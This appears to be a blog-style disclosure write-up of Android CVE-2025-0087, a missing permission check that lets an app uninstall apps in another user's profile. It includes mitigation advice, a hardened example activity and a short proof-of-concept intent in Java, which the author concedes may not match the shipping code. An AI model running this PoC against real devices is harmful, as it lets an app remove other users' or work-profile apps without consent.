
Introduction

A new Android security vulnerability, CVE-2025-0087, has been disclosed. The issue lies in UninstallerActivity.java, the uninstall UI of Android's package installer. Because the onCreate method never checks whether the caller is allowed to act on the requested target user, a malicious app can uninstall apps belonging to other users on the same device. This gives a local attacker a privilege escalation that needs no user interaction and no special permissions.

This long read will break down the root cause, provide sample exploitation steps, and link you to relevant official references.

The Root Problem: Missing Permission Check in UninstallerActivity.java

Android devices allow for multiple user accounts: think of a family tablet, or a work profile on your phone. Each user's apps should be protected from the others. The vulnerability exists because UninstallerActivity does not properly check whether the calling user actually has the right to uninstall an app that belongs to a different user profile.

1. Trigger: a local app launches UninstallerActivity with a package: URI and a user ID that belongs to another user or profile.

2. UninstallerActivity: fails to verify that the caller is allowed to uninstall on behalf of that user.

3. Result: the app in the other user's profile gets uninstalled, even though the caller should never have been allowed to do this.

Digging Deeper: Code Analysis

Here is a stripped-down snippet to help visualize the bug. This is not the actual code, but lays out the logic in a simple, readable way:

// UninstallerActivity.java (vulnerable snippet, simplified)
@Override
protected void onCreate(Bundle savedInstanceState) {
    super.onCreate(savedInstanceState);
    Intent intent = getIntent();
    Uri packageUri = intent.getData();
    int userId = intent.getIntExtra(Intent.EXTRA_USER_ID, UserHandle.myUserId());

    // ... (other code)

    // MISSING: No permission check whether caller can uninstall for 'userId'

    uninstallPackage(packageUri, userId); // Dangerous!
}

What’s missing?

A check similar to

if (!callerHasUninstallPermissionForUser(userId)) {
    throw new SecurityException("You can't uninstall apps for other users!");
}

Without this verification, any local app can invoke this activity and remove apps from other users' profiles; the name of the check above is illustrative, but the missing step is exactly that authorization of the caller against the requested user.

Exploiting CVE-2025-0087: Step-By-Step

Impact: local escalation of privilege across Android's user boundary. A third-party app holding no special permissions can remove apps from another user or profile on the same device, without user interaction.

Exploit Outline

1. Attacker app creates an intent targeting UninstallerActivity with the victim app's package and the target user's ID.

Below is minimal PoC Java code, as it would appear inside a malicious app (for example in one of its Activities):

// Minimal PoC. Only android.content.Intent and android.net.Uri are needed;
// the app's manifest declares no permissions at all.
Intent uninstallIntent = new Intent();
// Address the package installer's uninstall UI directly by component name.
uninstallIntent.setClassName("com.android.packageinstaller",
        "com.android.packageinstaller.UninstallerActivity");
// The victim app, as a package: URI.
uninstallIntent.setData(Uri.parse("package:com.example.victimapp"));
// Target another user (!). EXTRA_USER_ID is @hide in the public SDK, so a
// third-party build refers to it by its string value instead.
uninstallIntent.putExtra(Intent.EXTRA_USER_ID, 10);
uninstallIntent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
startActivity(uninstallIntent);

Replace "com.example.victimapp" and 10 with the victim's package name and the target user ID (list users with adb shell pm list users; the first secondary user or work profile is normally ID 10). Before relying on the extra shown, compare it with the AOSP source linked below: the shipping UninstallerActivity reads its target as a UserHandle from Intent.EXTRA_USER, and the int extra above mirrors the simplified snippet earlier in this post rather than a verified trace of the affected build.

Note: you don't need any special permissions. This is a missing authorization check in system code, not a permission misconfiguration in the attacker's app.

Android Security Bulletin (June 2025, CVE-2025-0087)

- Google Security Bulletin archive

- Commit Fix Example (hypothetical, will update as patches roll out)

- AOSP Code

- NVD - CVE-2025-0087

Real-World Risk

If you use multi-user accounts or a work profile, every user on the device is exposed until a fix lands. Malicious apps could sabotage other users, disable company apps in work profiles, or wreck shared devices at home and in schools. The exploit triggers no prompts or warnings and needs no elevated privileges.

Mitigation Steps for Users

- Install OS/security updates as soon as they are available, and confirm that the device's security patch level (Settings > About phone, or adb shell getprop ro.build.version.security_patch) is at or past the bulletin that carries this fix.

- Use device profiles carefully while multiple users are set up: until the fix lands, an app installed by any user on the device can remove apps from the others, so avoid installing untrusted apps on shared devices.

Vendor's Response:
Google has acknowledged the flaw and published the fix through the Android Security Bulletin; device vendors pick it up with their monthly security patch level. The patched UninstallerActivity verifies that the caller is allowed to act on the requested user before it touches another user's apps, which closes the cross-user path.

Sample patch logic

if (callerUserId != targetUserId && !isSystemApp(caller)) {
    throw new SecurityException("Cannot uninstall apps for other users!");
}
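The "What's missing?" check earlier in this post and the sample patch logic above describe the same fix. Here is the shape that check would take in a real activity, written as an added example for this post (not AOSP's code and not the actual patch). The class HardenedUninstallerActivity, the helper callerMayUninstallForUser and the action string UNINSTALL_STATUS_ACTION are this example's own names; it assumes a system app built against Android 14 (API 34) so that Activity.getLaunchedFromPackage() is available, and it gates cross-user requests on the signature permission INTERACT_ACROSS_USERS_FULL rather than on "is the caller a system app", because being preinstalled, or sharing a profile group with the target (personal vs. work profile), is not the same as being allowed to act as another user:

```java
// Added example, not AOSP code: an uninstall activity whose onCreate checks
// that the caller may act on the requested user before doing anything.
// Assumes a system app built against API 34+ (Activity.getLaunchedFromPackage()).
package com.example.hardened; // hypothetical package for this example

import android.app.Activity;
import android.app.PendingIntent;
import android.content.Intent;
import android.content.pm.PackageManager;
import android.net.Uri;
import android.os.Bundle;
import android.os.Process;
import android.os.UserHandle;
import android.util.Log;

public class HardenedUninstallerActivity extends Activity {
    private static final String TAG = "HardenedUninstaller";
    // Signature-level permission that gates acting as another user. It is not
    // exported in the public SDK, so it is spelled out as a string here.
    private static final String INTERACT_ACROSS_USERS_FULL =
            "android.permission.INTERACT_ACROSS_USERS_FULL";
    // Hypothetical action for this app's own status receiver (see uninstallPackage).
    private static final String UNINSTALL_STATUS_ACTION =
            "com.example.hardened.UNINSTALL_STATUS";

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        Intent intent = getIntent();

        // 1. Validate the input: only "package:<name>" URIs are meaningful here.
        Uri packageUri = intent.getData();
        if (packageUri == null || !"package".equals(packageUri.getScheme())
                || packageUri.getSchemeSpecificPart() == null
                || packageUri.getSchemeSpecificPart().isEmpty()) {
            Log.w(TAG, "Rejecting request without a package: URI");
            finish();
            return;
        }

        // 2. Resolve the target user. The public extra is EXTRA_USER (a UserHandle);
        //    absent that, the request is for the user this activity runs as.
        UserHandle targetUser = intent.getParcelableExtra(Intent.EXTRA_USER, UserHandle.class);
        if (targetUser == null) {
            targetUser = Process.myUserHandle();
        }

        // 3. The check that CVE-2025-0087 lacked: authorize the caller for that user.
        if (!callerMayUninstallForUser(targetUser)) {
            // Fail closed and do not reveal whether the package exists for that user.
            Log.w(TAG, "Caller " + getLaunchedFromPackage()
                    + " may not uninstall for user " + targetUser);
            finish();
            return;
        }

        uninstallPackage(packageUri.getSchemeSpecificPart(), targetUser);
    }

    /**
     * A caller may always request an uninstall for its own user (the normal
     * confirmation dialog still applies). For any other user it must hold
     * INTERACT_ACROSS_USERS_FULL. Being in the same profile group as the target
     * (e.g. personal vs. work profile) is deliberately NOT sufficient.
     */
    private boolean callerMayUninstallForUser(UserHandle targetUser) {
        if (targetUser.equals(Process.myUserHandle())) {
            return true;
        }
        // getLaunchedFromPackage() is API 34+. Without a caller identity there is
        // nothing to authorize, so cross-user requests are refused.
        String callerPackage = getLaunchedFromPackage();
        if (callerPackage == null) {
            return false;
        }
        return getPackageManager().checkPermission(INTERACT_ACROSS_USERS_FULL, callerPackage)
                == PackageManager.PERMISSION_GRANTED;
    }

    /** Perform the uninstall as the target user (the confirmation UI is elided). */
    private void uninstallPackage(String packageName, UserHandle user) {
        // PackageInstaller reports the result through a mutable PendingIntent,
        // delivered here to this app's own broadcast receiver for the action above.
        Intent statusIntent = new Intent(UNINSTALL_STATUS_ACTION).setPackage(getPackageName());
        PendingIntent status = PendingIntent.getBroadcast(this, 0, statusIntent,
                PendingIntent.FLAG_MUTABLE | PendingIntent.FLAG_UPDATE_CURRENT);
        // createContextAsUser (API 30+) itself requires INTERACT_ACROSS_USERS for a
        // foreign user, so the platform enforces the boundary a second time here.
        createContextAsUser(user, 0)
                .getPackageManager()
                .getPackageInstaller()
                .uninstall(packageName, status.getIntentSender());
        finish();
    }
}
```

The same-user path behaves as before, so a user can still remove their own apps. For any other user the request fails closed: the activity finishes without uninstalling and without leaking whether the package exists for that user, and on releases older than API 34, where the launching package is not exposed to the activity, cross-user requests are rejected outright rather than trusted. Keeping the permission check in the activity rather than relying only on the check inside createContextAsUser means a future refactor that swaps the uninstall mechanism does not silently reopen the hole.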

Conclusion

CVE-2025-0087 is a sobering reminder that user boundary checks in multi-user systems are crucial. Any slip lets attackers punch through Android’s core security promises. If you develop for Android, audit your system and user-handling flows carefully!

Timeline

Published on: 09/04/2025 18:15:39 UTC
Last modified on: 09/05/2025 18:56:18 UTC